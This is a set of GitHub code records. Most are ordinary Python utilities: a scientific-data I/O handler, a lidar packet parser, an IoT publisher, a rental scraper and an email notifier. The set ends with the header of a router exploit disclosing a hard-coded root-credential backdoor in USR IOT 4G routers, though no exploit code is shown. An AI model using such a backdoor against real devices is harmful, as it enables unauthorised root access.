},\n]\n","repo_name":"CSCfi/Kielipankki-utilities","sub_path":"vrt-tools/tests/scripttests/scripttest_scripttestlib.py","file_name":"scripttest_scripttestlib.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"42057007396","text":"from collections import defaultdict\n\nimport numpy as np\n\nfrom yt.frontends.open_pmd.misc import get_component, is_const_component\nfrom yt.geometry.selection_routines import GridSelector\nfrom yt.utilities.io_handler import BaseIOHandler\n\n\nclass IOHandlerOpenPMDHDF5(BaseIOHandler):\n _field_dtype = \"float32\"\n _dataset_type = \"openPMD\"\n\n def __init__(self, ds, *args, **kwargs):\n self.ds = ds\n self._handle = ds._handle\n self.base_path = ds.base_path\n self.meshes_path = ds.meshes_path\n self.particles_path = ds.particles_path\n self._array_fields = {}\n self._cached_ptype = \"\"\n\n def _fill_cache(self, ptype, index=0, offset=None):\n \"\"\"Fills the particle position cache for the ``ptype``.\n\n Parameters\n ----------\n ptype : str\n The on-disk name of the particle species\n index : int, optional\n offset : int, optional\n \"\"\"\n if str((ptype, index, offset)) not in self._cached_ptype:\n self._cached_ptype = str((ptype, index, offset))\n pds = self._handle[self.base_path + self.particles_path + \"/\" + ptype]\n axes = list(pds[\"position\"].keys())\n if offset is None:\n if is_const_component(pds[\"position/\" + axes[0]]):\n offset = pds[\"position/\" + axes[0]].attrs[\"shape\"]\n else:\n offset = pds[\"position/\" + axes[0]].len()\n self.cache = np.empty((3, offset), dtype=np.float64)\n for i in np.arange(3):\n ax = \"xyz\"[i]\n if ax in axes:\n np.add(\n get_component(pds, \"position/\" + ax, index, offset),\n get_component(pds, \"positionOffset/\" + ax, index, offset),\n self.cache[i],\n )\n else:\n # Pad accordingly with zeros to make 1D/2D datasets compatible\n # These have to be the same shape as the existing axes since that\n # equals the number of particles\n self.cache[i] = np.zeros(offset)\n\n def _read_particle_selection(self, chunks, selector, fields):\n \"\"\"Read particle fields for 
particle species masked by a selection.\n\n Parameters\n ----------\n chunks\n A list of chunks\n A chunk is a list of grids\n selector\n A region (inside your domain) specifying which parts of the field\n you want to read. See [1] and [2]\n fields : array_like\n Tuples (ptype, pfield) representing a field\n\n Returns\n -------\n dict\n keys are tuples (ptype, pfield) representing a field\n values are (N,) ndarrays with data from that field\n \"\"\"\n f = self._handle\n bp = self.base_path\n pp = self.particles_path\n ds = f[bp + pp]\n unions = self.ds.particle_unions\n chunks = list(chunks) # chunks is a generator\n\n rv = {}\n ind = {}\n particle_count = {}\n ptf = defaultdict(list) # ParticleTypes&Fields\n rfm = defaultdict(list) # RequestFieldMapping\n\n for ptype, pname in fields:\n pfield = (ptype, pname)\n # Overestimate the size of all pfields so they include all particles\n # and shrink it later\n particle_count[pfield] = 0\n if ptype in unions:\n for pt in unions[ptype]:\n particle_count[pfield] += self.ds.particle_type_counts[pt]\n ptf[pt].append(pname)\n rfm[pt, pname].append(pfield)\n else:\n particle_count[pfield] = self.ds.particle_type_counts[ptype]\n ptf[ptype].append(pname)\n rfm[pfield].append(pfield)\n rv[pfield] = np.empty((particle_count[pfield],), dtype=np.float64)\n ind[pfield] = 0\n\n for ptype in ptf:\n for chunk in chunks:\n for grid in chunk.objs:\n if str(ptype) == \"io\":\n species = list(ds.keys())[0]\n else:\n species = ptype\n if species not in grid.ptypes:\n continue\n # read particle coords into cache\n self._fill_cache(species, grid.pindex, grid.poffset)\n mask = selector.select_points(\n self.cache[0], self.cache[1], self.cache[2], 0.0\n )\n if mask is None:\n continue\n pds = ds[species]\n for field in ptf[ptype]:\n component = \"/\".join(field.split(\"_\")[1:])\n component = component.replace(\"positionCoarse\", \"position\")\n component = component.replace(\"-\", \"_\")\n data = get_component(pds, component, grid.pindex, grid.poffset)[\n mask\n ]\n for request_field in rfm[(ptype, field)]:\n rv[request_field][\n ind[request_field] : ind[request_field] + data.shape[0]\n ] = data\n ind[request_field] += data.shape[0]\n\n for field in fields:\n rv[field] = rv[field][: ind[field]]\n\n return rv\n\n def _read_fluid_selection(self, chunks, selector, fields, size):\n \"\"\"Reads given fields masked by a given selection.\n\n Parameters\n ----------\n chunks\n A list of chunks\n A chunk is a list of grids\n selector\n A region (inside your domain) specifying which parts of the field\n you want to read. 
See [1] and [2]\n fields : array_like\n Tuples (fname, ftype) representing a field\n size : int\n Size of the data to read\n\n Returns\n -------\n dict\n keys are tuples (ftype, fname) representing a field\n values are flat (``size``,) ndarrays with data from that field\n \"\"\"\n f = self._handle\n bp = self.base_path\n mp = self.meshes_path\n ds = f[bp + mp]\n chunks = list(chunks)\n\n rv = {}\n ind = {}\n\n if isinstance(selector, GridSelector):\n if not (len(chunks) == len(chunks[0].objs) == 1):\n raise RuntimeError\n\n if size is None:\n size = sum(g.count(selector) for chunk in chunks for g in chunk.objs)\n for field in fields:\n rv[field] = np.empty(size, dtype=np.float64)\n ind[field] = 0\n\n for ftype, fname in fields:\n field = (ftype, fname)\n for chunk in chunks:\n for grid in chunk.objs:\n mask = grid._get_selector_mask(selector)\n if mask is None:\n continue\n component = fname.replace(\"_\", \"/\").replace(\"-\", \"_\")\n if component.split(\"/\")[0] not in grid.ftypes:\n data = np.full(grid.ActiveDimensions, 0, dtype=np.float64)\n else:\n data = get_component(ds, component, grid.findex, grid.foffset)\n # The following is a modified AMRGridPatch.select(...)\n data.shape = (\n mask.shape\n ) # Workaround - casts a 2D (x,y) array to 3D (x,y,1)\n count = grid.count(selector)\n rv[field][ind[field] : ind[field] + count] = data[mask]\n ind[field] += count\n\n for field in fields:\n rv[field] = rv[field][: ind[field]]\n rv[field].flatten()\n\n return rv\n","repo_name":"yt-project/yt","sub_path":"yt/frontends/open_pmd/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","stars":411,"dataset":"github-code","pt":"3"} +{"seq_id":"11421754021","text":"from scansegmentdecoding import connectionHandler\n\nimport numpy as np\nimport struct\nimport sys\nimport zlib\n\n\ndef parseFromFile(filename):\n \"\"\"\n Reads a Compact formatted binary file and parses its content to a dictionary.\n \"\"\"\n with open(filename, \"rb\") as f:\n print(f\"Parsing {filename}...\")\n byte_data = f.read()\n payload = _verifyAndExtractPayload(byte_data)\n return parsePayload(payload)\n\n\ndef parsePayload(payload):\n \"\"\"\n Parses a Compact formatted byte array into a dictionary.\n \"\"\"\n #\n # In compact format the payload consists of a header which is 32 bytes long and zero or more modules of variable\n # length depending on the number of layers in the segment. 
The header stores the size of the very first module\n # whereas each module stores the size of the folloing module in its metadata.\n #\n # | Header | Module 1 | Module 2 | ...\n # 0 32 X Y\n #\n # With X = size of module 1 + 32\n # Y = size of module 2 + size of module 1 + 32\n #\n result = {\n \"Modules\": []\n }\n (header, next_module_size) = _readHeader(payload)\n last_module_size = 0\n\n result.update(header)\n\n offset = 32 # 32 bytes header size\n while next_module_size > 0:\n last_module_size = next_module_size\n (module_data, next_module_size) = _readNextModule(payload, offset)\n if module_data is None:\n print(f\"Failed to read module data.\", file=sys.stderr)\n return None\n result[\"Modules\"].append(module_data)\n offset += last_module_size\n\n return result\n\n\ndef _verifyAndExtractPayload(data):\n \"\"\"\n Checks for the STX byte sequence and applies CRC.\n \"\"\"\n bytes_frame_start = data[0:4]\n bytes_crc = data[-4:]\n # CRC is computed over whole data including the frame start bytes.\n bytes_payload = data[0:-4]\n\n # Check if frame header is included.\n if b'\\x02\\x02\\x02\\x02' != bytes_frame_start:\n print(\n \"Missing start of frame sequence [0x02 0x02 0x02 0x02].\", file=sys.stderr)\n return None\n\n # Apply CRC\n expected_crc = int.from_bytes(bytes_crc, 'little')\n computed_crc = zlib.crc32(bytes_payload)\n if expected_crc != computed_crc:\n print(\n f\"CRC failed. Expected {expected_crc}, got {computed_crc}.\", file=sys.stderr)\n return None\n\n return bytes_payload\n\n\ndef _readHeader(data):\n \"\"\"\n Reads the header data from the given compact formatted data array.\n \"\"\"\n # The header itself is 32 bytes long.\n #\n # | <STX><STX><STX><STX> | CommandId | TelegramCounter | TimestampTransmit | Version | ModuleSize |\n # 0 4 8 16 24 28 32\n #\n command_id, _ = _readUint32(data, 4)\n telegram_counter, _ = _readUint64(data, 8)\n timestamp_transmit, _ = _readUint64(data, 16)\n version, _ = _readUint32(data, 24)\n next_module_size, _ = _readUint32(data, 28)\n\n header = {\n 'CommandId': command_id,\n 'TelegramCounter': telegram_counter,\n 'TimestampTransmit': timestamp_transmit,\n 'Version': version\n }\n return (header, next_module_size)\n\n\ndef _readNextModule(data, offset):\n \"\"\"\n Reads the module at the given offset.\n \"\"\"\n #\n # A module always consists of two blocks of variable lengths. The first block contains the metadata describing\n # the actual contents of the module (beamdata) which is stored in the second block.\n #\n # | STX | Header | Module 1 | Module 2 | ...\n # 0 4 32 X Y\n # | | +---------------------------------+\n # | | |\n # | +----------------+ |\n # | | |\n # ... | Metadata 1 | Beamdata 1 | Metadata 2 | Beamdata 2 | ...\n #\n metadata, next_module_size, offset = _readMetaData(data, offset)\n beamdata = _readBeamData(data, metadata, offset)\n\n # Merge metadata and beam data into a single dictionary.\n module_data = {}\n module_data.update(metadata)\n module_data.update(beamdata)\n\n return (module_data, next_module_size)\n\n\ndef _readMetaData(data, offset):\n # The metadata itself has variable length depending on the number layers which is also encoded in this block.\n # For example consider a block starting at offset X:\n #\n # | SegmentCounter | FrameNumber | SenderId | NumLayers | BeamCount | EchoCount |\n # X X+8 X+16 X+20 X+24 X+28 X+32\n #\n # The first portion of the metadata has a fixed length of 32 byte. 
Afterwards array data is included:\n #\n # | TimestampStart | TimestampStop | Phi | ThetaStart | ThetaStop | DistanceScalingFactor\n # X+32 +(NumLayers*8) +(NumLayers*8) +(NumLayers*4) +(NumLayers*4) +(NumLayers*4) + 4\n #\n # In sum this block stops at byte offset Y = (X+32)+(2*NumLayers*8)+(3*NumLayers*4)+4 = (X+32)+(28*NumLayers)+4\n # Finally, the block is concluded with a fixed size portion again:\n #\n # | NextModuleSize | Availability | DataContentEchos | DataContentBeams | Reserved |\n # Y Y+4 Y+5 Y+6 Y+7 Y+8\n #\n segment_counter, offset = _readUint64(data, offset)\n frame_number, offset = _readUint64(data, offset)\n sender_id, offset = _readUint32(data, offset)\n num_layers, offset = _readUint32(data, offset)\n beam_count, offset = _readUint32(data, offset)\n echo_count, offset = _readUint32(data, offset)\n timestamp_start, offset = _readUint64Array(data, num_layers, offset)\n timestamp_stop, offset = _readUint64Array(data, num_layers, offset)\n phi, offset = _readFloat32Array(data, num_layers, offset)\n theta_start, offset = _readFloat32Array(data, num_layers, offset)\n theta_stop, offset = _readFloat32Array(data, num_layers, offset)\n distance_scaling_factor, offset = _readFloat32(data, offset)\n next_module_size, offset = _readUint32(data, offset)\n availability, offset = _readUint8(data, offset)\n data_content_echos, offset = _readUint8(data, offset)\n data_content_beams, offset = _readUint8(data, offset)\n reserved, offset = _readUint8(data, offset)\n\n # Bit mask to be applied on the 'data_content' variables.\n mask_distance_available = 0x01\n mask_rssi_available = 0x02\n mask_properties_available = 0x01\n mask_theta_available = 0x02\n\n metaData = {\n \"SegmentCounter\": segment_counter,\n \"FrameNumber\": frame_number,\n \"SenderId\": sender_id,\n \"NumberOfLinesInModule\": num_layers,\n \"NumberOfBeamsPerScan\": beam_count,\n \"NumberOfEchosPerBeam\": echo_count,\n \"TimestampStart\": timestamp_start,\n \"TimestampStop\": timestamp_stop,\n \"Phi\": phi,\n \"ThetaStart\": theta_start,\n \"ThetaStop\": theta_stop,\n \"DistanceScalingFactor\": distance_scaling_factor,\n \"Availability\": availability,\n \"DataContentEchos\": data_content_echos,\n \"DataContentBeams\": data_content_beams,\n \"HasDistance\": ((data_content_echos & mask_distance_available) != 0),\n \"HasRssi\": ((data_content_echos & mask_rssi_available) != 0),\n \"HasProperties\": ((data_content_beams & mask_properties_available) != 0),\n \"HasTheta\": ((data_content_beams & mask_theta_available) != 0)\n\n }\n return (metaData, next_module_size, offset)\n\n\ndef _readBeamData(data, metadata, offset):\n #\n # If all channels are enabled, the beam data always has the following structure:\n #\n # | dist_00 | rssi_00 | ... | dist_0n | rssi_0n | theta_0 | prop_0 | <- Data of beam 0\n # | dist_10 | rssi_10 | ... | dist_1n | rssi_1n | theta_1 | prop_1 | <- Data of beam 1\n # ...\n # | dist_m0 | rssi_m0 | ... | dist_mn | rssi_mn | theta_m | prop_m | <- Data of beam m\n #\n # whereas dist_mn and rssi_mn are the distance and rssi values respectively for beam m and echo n.\n # theta_m and prop_m are theta and property values of beam m respectively.\n # Only distance values are required. More than one echos are optional as well as existence of rssi, theta and\n # property data. Therefore the bare minimum a segment in compact format can have is:\n #\n # | dist_00 | dist_10 | ... 
| dist_m0 | <- One single distance value for each of the m beams (each with only one echo).\n #\n num_layers = metadata[\"NumberOfLinesInModule\"]\n num_echos = metadata[\"NumberOfEchosPerBeam\"]\n num_beams = metadata[\"NumberOfBeamsPerScan\"]\n\n # Prepare result object by creating an array of empty, zero-initialized dictionaries, one for each layer.\n result = [{\n # Matrix of size num_echos * num_beams.\n 'Rssi': [np.zeros(num_beams) for n in range(num_echos)],\n # Matrix of size num_echos * num_beams.\n 'Distance': [np.zeros(num_beams) for n in range(num_echos)],\n 'ChannelTheta': np.zeros(num_beams),\n 'Properties': np.zeros(num_beams)\n } for n in range(num_layers)]\n\n if not metadata[\"HasDistance\"]:\n print(\n f\"Failed to read beam data from module. No distance data available. Metadata: {metadata}\", file=sys.stderr)\n return None\n\n # Format string used when data is unpacked. For example for three echos, when all data channels are active the\n # result will be '<HHHHHHBH' (6 x 16-bit values = 3 x distance + 3 x rssi, 1 x property, 1 x theta\n # encoding the property all in little endian format marked by '<').\n # See https://docs.python.org/3/library/struct.html for further information.\n format_string = \"<\" \\\n + num_echos * \"H\" \\\n + (num_echos * \"H\" if metadata[\"HasRssi\"] else \"\") \\\n + (\"B\" if metadata[\"HasProperties\"] else \"\") \\\n + (\"H\" if metadata[\"HasTheta\"] else \"\")\n\n # Data is extracted beam by beam from payload whereas all values related to a single beam are parsed at once in\n # each iteration and stored in a tuple. Each beam value (distance, rssi, theta and property) are stored at a\n # distinct index in this tuple:\n tuple_indices_distance = [0] * num_echos\n tuple_indices_rssi = [0] * num_echos\n tuple_index_theta = 0\n tuple_index_property = 0\n tuple_index = 0\n for echo_idx in range(num_echos):\n tuple_indices_distance[echo_idx] = tuple_index\n tuple_index += 1\n if metadata[\"HasRssi\"]:\n tuple_indices_rssi[echo_idx] = tuple_index\n tuple_index += 1\n if metadata[\"HasProperties\"]:\n tuple_index_property = tuple_index\n tuple_index += 1\n if metadata[\"HasTheta\"]:\n tuple_index_theta = tuple_index\n\n # Extract data from payload.\n for beam_idx in range(num_beams):\n for layer_idx in range(num_layers):\n # Extract all beam values at once (as tuple) according to declared format string.\n beamdata = struct.unpack_from(format_string, data, offset)\n offset += struct.calcsize(format_string)\n for echo_idx in range(num_echos):\n tuple_index_distance = tuple_indices_distance[echo_idx]\n tuple_index_rssi = tuple_indices_rssi[echo_idx]\n result[layer_idx]['Distance'][echo_idx][beam_idx] = beamdata[tuple_index_distance] * metadata[\"DistanceScalingFactor\"]\n result[layer_idx]['Rssi'][echo_idx][beam_idx] = beamdata[tuple_index_rssi] if metadata[\"HasRssi\"] else None\n # Theta must be converted from simple unsigned int to actual angle in radians according to: angleUINT = floor(angleRAD * 5215 + 16384)\n result[layer_idx]['ChannelTheta'][beam_idx] = (\n beamdata[tuple_index_theta] - 16384) / 5215.0 if metadata[\"HasTheta\"] else None\n result[layer_idx]['Properties'][beam_idx] = beamdata[tuple_index_property] if metadata[\"HasProperties\"] else None\n\n return {'SegmentData': result}\n\n\ndef _readUint8(data, offset):\n \"\"\"\n Reads one byte as integer at the given offset. 
Additionally the position of the byte following the integer is\n returned.\n \"\"\"\n return _readUint(data, offset, 1)\n\n\ndef _readUint32(data, offset):\n \"\"\"\n Reads four bytes as integer at the given offset. Additionally the position of the byte following the integer is\n returned.\n \"\"\"\n return _readUint(data, offset, 4)\n\n\ndef _readUint64(data, offset):\n \"\"\"\n Reads eight bytes as integer at the given offset. Additionally the position of the byte following the integer is\n returned.\n \"\"\"\n return _readUint(data, offset, 8)\n\n\ndef _readUint(data, offset, value_size):\n \"\"\"\n Reads an integer of the given size at the specified offset. Additionally the position of the byte following the\n integer is returned.\n \"\"\"\n value = int.from_bytes(\n data[offset:offset+value_size], byteorder='little', signed='false')\n return (value, offset + value_size)\n\n\ndef _readFloat32(data, offset):\n \"\"\"\n Reads four bytes as float at the given offset. Additionally the position of the byte following the float is\n returned.\n \"\"\"\n value_size = 4\n value = struct.unpack('<f', data[offset:offset+value_size])\n return (value[0], offset + value_size)\n\n\ndef _readUint64Array(data, num_elements, offset):\n \"\"\"\n Reads num_elements * 8 bytes as an unsigned integer array at the given offset. Additionally the position of the byte\n following the array is returned.\n \"\"\"\n value_size = num_elements * 8\n array_data = struct.unpack_from('<'+f\"{num_elements}\"+'Q', data, offset)\n return (np.array(array_data), offset + value_size)\n\n\ndef _readFloat32Array(data, num_elements, offset):\n \"\"\"\n Reads num_elements * 4 bytes as a float array at the given offset. Additionally the position of the byte\n following the array is returned.\n \"\"\"\n value_size = num_elements * 4\n array_data = struct.unpack_from('<'+f\"{num_elements}\"+'f', data, offset)\n return (np.array(array_data), offset + value_size)\n\n# ===============================================================================\n\n\nclass Receiver:\n \"\"\"\n Opens the specified port (default is 2115) to listen for incoming Compact formatted segments.\n \"\"\"\n\n def __init__(self, host=\"localhost\", port=2115):\n self.connection = connectionHandler.UDPHandler(\n host,\n port,\n # Remote address actually not used since we just want to receive and not send data.\n \"localhost\",\n # Remote port actually not used since we just want to receive and not send data.\n 65535,\n # Buffersize should be large enough to handle multiple layers with many beams.\n 100000\n )\n\n def closeConnection(self):\n \"\"\"\n Closes the underlying connection.\n \"\"\"\n del self.connection\n\n # receive the specified number of segments\n def receiveSegments(self, nbSegments):\n \"\"\"\n Receives the specified number of segments and returns them as an array along with arrays of corresponding frame\n and segment numbers.\n \"\"\"\n segments_received = []\n frame_numbers = []\n segment_numbers = []\n\n for i in range(0, nbSegments):\n bytes_received, _ = self.connection.receiveNewScanSegment()\n if self.connection.hasNoError():\n print(f\"Received segment {i}.\")\n payload = _verifyAndExtractPayload(bytes_received)\n if payload is None:\n print(f\"Failed to extract payload from data.\", file=sys.stderr)\n continue\n segmentdata = parsePayload(payload)\n if segmentdata is None:\n print(f\"Failed to parse segment data from payload.\",\n file=sys.stderr)\n segments_received.append(segmentdata)\n 
frame_numbers.append(segmentdata[\"Modules\"][0]['FrameNumber'])\n segment_numbers.append(\n segmentdata[\"Modules\"][0]['SegmentCounter'])\n else:\n print(\n f\"Failed to receive segment. Error code {self.connection.getLastErrorCode}: {self.connection.lastErrorMessage}\", file=sys.stderr)\n\n return (segments_received, frame_numbers, segment_numbers)\n","repo_name":"SICKAG/ScanSegmentAPI","sub_path":"api/compact.py","file_name":"compact.py","file_ext":"py","file_size_in_byte":16481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73442645202","text":"# -*- coding: utf-8 -*-\n\"\"\"\nセンサー値をクラウドにアップロードするコード\n引数1: センサー値のリアルタイムデータ(JSON)\n\"\"\"\nimport sys\nimport json\nimport boto3\nimport datetime\nfrom boto3.session import Session\n\n# ----- 定数 -----\n# このファイルを実行時に受け取る引数(str型)\nARGS = sys.argv\n\n# AWS プロファイル情報\nPROFILE_NAME = 'zynq-handson'\nsession = Session(profile_name=PROFILE_NAME, region_name=\"ap-northeast-1\")\nIOT_DATA = session.client('iot-data')\n\nclass PubSensorData():\n def __init__(self):\n self.arg_accel_x_data = ARGS[1]\n self.arg_accel_y_data = ARGS[2]\n self.arg_accel_z_data = ARGS[3]\n self.arg_gyro_x_data = ARGS[4]\n self.arg_gyro_y_data = ARGS[5]\n self.arg_gyro_z_data = ARGS[6]\n self.arg_mag_x_data = ARGS[7]\n self.arg_mag_y_data = ARGS[8]\n self.arg_mag_z_data = ARGS[9]\n\n def get_now_datetime(self):\n now = datetime.datetime.now(tz=datetime.timezone.utc)\n timestamp = now.strftime('%Y-%m-%dT%H:%M:%SZ')\n return timestamp\n\n def create_json_data(self, timestamp):\n sensor_data_json = {\n \"DeviceID\": \"id001\",\n \"Datetime\": timestamp,\n \"AccelX\": float(self.arg_accel_x_data),\n \"AccelY\": float(self.arg_accel_y_data),\n \"AccelZ\": float(self.arg_accel_z_data),\n \"GyroX\" : float(self.arg_gyro_x_data),\n \"GyroY\" : float(self.arg_gyro_y_data),\n \"GyroZ\" : float(self.arg_gyro_z_data),\n \"MagX\" : float(self.arg_mag_x_data),\n \"MagY\" : float(self.arg_mag_y_data),\n \"MagZ\" : float(self.arg_mag_z_data)\n }\n return json.dumps(sensor_data_json)\n\n def publish_sensor_data(self, sensor_data):\n response = IOT_DATA.publish(\n topic='handson/sensorLogData',\n qos = 1,\n payload = sensor_data\n )\n print(response)\n \n def main(self):\n try:\n timestamp = self.get_now_datetime()\n sensor_data = self.create_json_data(timestamp)\n self.publish_sensor_data(sensor_data)\n except Exception as error:\n print(error)\n\n# 初期化\npub_sensor_data = PubSensorData()\n\nif __name__ == \"__main__\":\n pub_sensor_data.main()\n","repo_name":"IoTkyoto/iot-handson-zynq-and-aws","sub_path":"step4/pub_sensor_data.py","file_name":"pub_sensor_data.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4571593696","text":"from bs4 import BeautifulSoup\nimport requests, json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\n\nGOOGLE_FORM = 'https://forms.gle/1EZEnfgpZDBcDzcg8'\nZILLOW_URL = 
'https://www.zillow.com/homes/for_rent/1-_beds/?searchQueryState=%7B%22pagination%22%3A%7B%7D%2C%22usersSearchTerm%22%3Anull%2C%22mapBounds%22%3A%7B%22west%22%3A-122.56276167822266%2C%22east%22%3A-122.30389632177734%2C%22south%22%3A37.69261345230467%2C%22north%22%3A37.857877098316834%7D%2C%22isMapVisible%22%3Atrue%2C%22filterState%22%3A%7B%22fr%22%3A%7B%22value%22%3Atrue%7D%2C%22fsba%22%3A%7B%22value%22%3Afalse%7D%2C%22fsbo%22%3A%7B%22value%22%3Afalse%7D%2C%22nc%22%3A%7B%22value%22%3Afalse%7D%2C%22cmsn%22%3A%7B%22value%22%3Afalse%7D%2C%22auc%22%3A%7B%22value%22%3Afalse%7D%2C%22fore%22%3A%7B%22value%22%3Afalse%7D%2C%22pmf%22%3A%7B%22value%22%3Afalse%7D%2C%22pf%22%3A%7B%22value%22%3Afalse%7D%2C%22mp%22%3A%7B%22max%22%3A3000%7D%2C%22price%22%3A%7B%22max%22%3A872627%7D%2C%22beds%22%3A%7B%22min%22%3A1%7D%7D%2C%22isListVisible%22%3Atrue%2C%22mapZoom%22%3A12%7D'\nCHROME_DRIVER_PATH = '<Chrome Driver Path>'\nplace_to_search = 'San Francisco, CA'\nZILLOW_MAIN_PAGE = 'https://www.zillow.com/'\n\n\nclass ZillowRent:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36',\n 'Accept-Language': 'en-US'\n }\n\n def __init__(self):\n self.response = requests.get(ZILLOW_URL, headers=self.headers)\n self.zillow_results = self.response.text\n self.soup = BeautifulSoup(self.zillow_results, \"html.parser\")\n self.data = json.loads(str(self.soup.select_one(\"script[data-zrr-shared-data-key]\").contents[0]).strip(\"!<>-\"))\n\n def getHouseLinks(self):\n house_links = [\n result[\"detailUrl\"]\n for result in self.data[\"cat1\"][\"searchResults\"][\"listResults\"]\n ]\n\n house_links = [links.replace(links, ZILLOW_MAIN_PAGE+links) if not links.startswith(\"http\") else links for links in house_links]\n return house_links\n\n def getHouseAddr(self):\n house_address = [\n result[\"address\"]\n for result in self.data[\"cat1\"][\"searchResults\"][\"listResults\"]\n ]\n return house_address\n\n def getRentPrice(self):\n house_rent = [\n int(result[\"units\"][0][\"price\"].strip(\"$\").replace(\",\", \"\").strip(\"+\"))\n if \"units\" in result\n else result[\"unformattedPrice\"]\n for result in self.data[\"cat1\"][\"searchResults\"][\"listResults\"]\n ]\n return house_rent\n\nclass GoogleForm:\n def __init__(self):\n self.data = ZillowRent()\n self.driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH)\n self.driver.get(GOOGLE_FORM)\n time.sleep(5)\n\n def getData(self):\n links = self.data.getHouseLinks()\n addr = self.data.getHouseAddr()\n rents = self.data.getRentPrice()\n return links, addr, rents\n\n def fillForm(self):\n links, addr, rents = self.getData()\n for index in range(len(links)):\n address_element = self.driver.find_element(By.XPATH, value='/html/body/div/div[2]/form/div[2]/div/div[2]/div[1]/div/div/div[2]/div/div[1]/div/div[1]/input')\n address_element.send_keys(addr[index])\n rent_element = self.driver.find_element(By.XPATH, value='/html/body/div/div[2]/form/div[2]/div/div[2]/div[2]/div/div/div[2]/div/div[1]/div/div[1]/input')\n rent_element.send_keys(rents[index])\n links_element = self.driver.find_element(By.XPATH, value='/html/body/div/div[2]/form/div[2]/div/div[2]/div[3]/div/div/div[2]/div/div[1]/div/div[1]/input')\n links_element.send_keys(links[index])\n submit = self.driver.find_element(By.XPATH, value='/html/body/div/div[2]/form/div[2]/div/div[3]/div[1]/div[1]/div/span/span')\n submit.click()\n time.sleep(3)\n next_response = self.driver.find_element(By.CSS_SELECTOR, value='.c2gzEf a')\n 
next_response.click()\n time.sleep(5)\n\n\nform = GoogleForm()\nform.fillForm()\n","repo_name":"kuntal2098/Zillow-Renting-Search","sub_path":"rentsearch.py","file_name":"rentsearch.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40708104205","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport requests\nimport datetime\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nfrom smtplib import SMTP_SSL\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nurl = \"http://dcfm.eastmoney.com/em_mutisvcexpandinterface/api/js/get?type=KZZ_LB&token=70f12f2f4f091e459a279469fe49eca5\"\nhttp_proxy = none #\"http://proxy-shm.intel.com:911\"\nhttps_proxy = none #\"https://proxy-shm.intel.com:911\"\n\nproxyDict = { \n \"http\" : http_proxy, \n \"https\" : https_proxy, \n }\n\nr = requests.get(url, proxies=proxyDict)\nr.raise_for_status()\n\ntoday = (datetime.datetime.now().date() + datetime.timedelta(days=2)).strftime('%Y-%m-%d')\n\noutput = \"今天是 {}\\n今日可申购可转债: \\n\".format(today)\nfor r in r.json():\n name, date, code = r.get(\"SNAME\"), r.get(\"STARTDATE\"), r.get(\"CORRESCODE\")\n if today in date:\n output += \",\".join((name, date, code))\n output += \"\\n\"\n\nhost_server = 'smtp.qq.com'\nsender_qq = '42397657'\npwd = ''\nsender_qq_mail = '42397657@qq.com'\nreceiver = 'ichbinblau.3@foxmail.com'\nmail_content = output\nmail_title = u\"今日可转债\"\n\n#ssl login\nsmtp = SMTP_SSL(host_server)\nsmtp.set_debuglevel(1)\nsmtp.ehlo(host_server)\nsmtp.login(sender_qq, pwd)\n\nmsg = MIMEText(mail_content, \"plain\", 'utf-8')\nmsg[\"Subject\"] = Header(mail_title, 'utf-8')\nmsg[\"From\"] = sender_qq_mail\nmsg[\"To\"] = receiver\nsmtp.sendmail(sender_qq_mail, receiver, msg.as_string())\nsmtp.quit()\n","repo_name":"ichbinblau/getBonds","sub_path":"pull.py","file_name":"pull.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39494916818","text":"# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor\n# Exploit Author: LiquidWorm\n\n#!/usr/bin/env python3\n#\n#\n# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor\n#\n#\n# Vendor: Jinan USR IOT Technology Limited\n# Product web page: https://www.pusr.com | https://www.usriot.com\n# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)\n# 1.2.7 (USR-LG220-L)\n#\n# Summary: USR-G806 is a industrial 4G wireless LTE router which provides\n# a solution for users to connect own device to 4G network via WiFi interface\n# or Ethernet interface. USR-G806 adopts high performance embedded CPU which\n# can support 580MHz working frequency and can be widely used in Smart Grid,\n# Smart Home, public bus and Vending machine for data transmission at high\n# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,\n# flow control and has many advantages including high reliability, simple\n# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,\n# WLAN interface, 4G interface. USR-G806 provides various networking mode\n# to help user establish own network.\n#\n# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials\n# within its Linux distribution image. These sets of credentials are never\n# exposed to the end-user and cannot be changed through any normal operation\n# of the device. 
